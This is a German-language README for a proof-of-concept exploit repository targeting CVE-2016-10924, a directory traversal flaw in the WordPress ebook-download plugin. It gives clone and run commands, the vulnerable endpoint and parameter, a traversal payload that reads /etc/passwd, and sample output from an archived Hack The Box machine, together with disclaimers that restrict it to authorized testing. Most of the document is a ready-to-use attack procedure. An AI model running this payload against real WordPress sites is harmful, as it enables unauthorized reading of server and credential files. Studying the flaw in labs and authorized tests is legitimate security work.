
Proof-of-Concept (PoC) Exploit-Skript für die Directory-Traversal-Schwachstelle (CVE-2016-10924), die im WordPress-Plugin ebook-download (Versionen < 1.2) gefunden wurde. Diese Schwachstelle ermöglicht unbefugte Dateiauslese über eine manipulierte GET-Anfrage.
Dieses Repository enthält ein Proof-of-Concept (PoC)-Exploit-Skript für die Directory Traversal-Schwachstelle (CVE-2016-10924), die im WordPress-Plugin ebook-download (Versionen < 1.2) gefunden wurde.
Diese Schwachstelle ermöglicht unbefugte Dateiauslesen über eine manipulierte GET-Anfrage. Der Exploit nutzt einen Parameter namens ebookdownloadurl, um Verzeichnisse auf dem Zielserver zu traversieren.
ebook-download-Plugin < 1.2 für WordPress/etc/passwd, indem sie den Dateipfad im Parameter ebookdownloadurl manipulieren.Hinweis: Dieses PoC dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Missbrauch dieser Informationen kann rechtliche Konsequenzen haben.
requests-Bibliothek (Installation mit pip install requests)Repository klonen:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Abhängigkeiten installieren:
pip install requests
Exploit ausführen:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Dateipfad angeben, der gelesen werden soll: Nach dem Start des Skripts werden Sie zur Eingabe eines Dateipfads aufgefordert. Beispiel:
../../../../../../../../../etc/passwd
Möglicherweise müssen Sie die Anzahl der ../ je nach Webroot-Verzeichnis in der Zielumgebung anpassen.
Beenden:
exit, quit ein oder drücken Sie Enter bei leerer Eingabeaufforderung, um zu beenden.Ich habe diesen Exploit auf „Backdoor“, einer archivierten Hack The Box-Maschine, verwendet:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
Dieses Projekt ist ausschließlich für Bildungs- und legitime Sicherheitstestzwecke vorgesehen.
Verwenden Sie die Informationen oder Skripte in diesem Repository nicht auf Systemen, für die Sie keine ausdrückliche Berechtigung zum Testen haben.
Autor und Mitwirkende sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieses Projekt ist unter der GNU 2.0-Lizenz lizenziert. Sie können es frei verwenden und modifizieren, aber bitte geben Sie Anerkennung.
Referenzen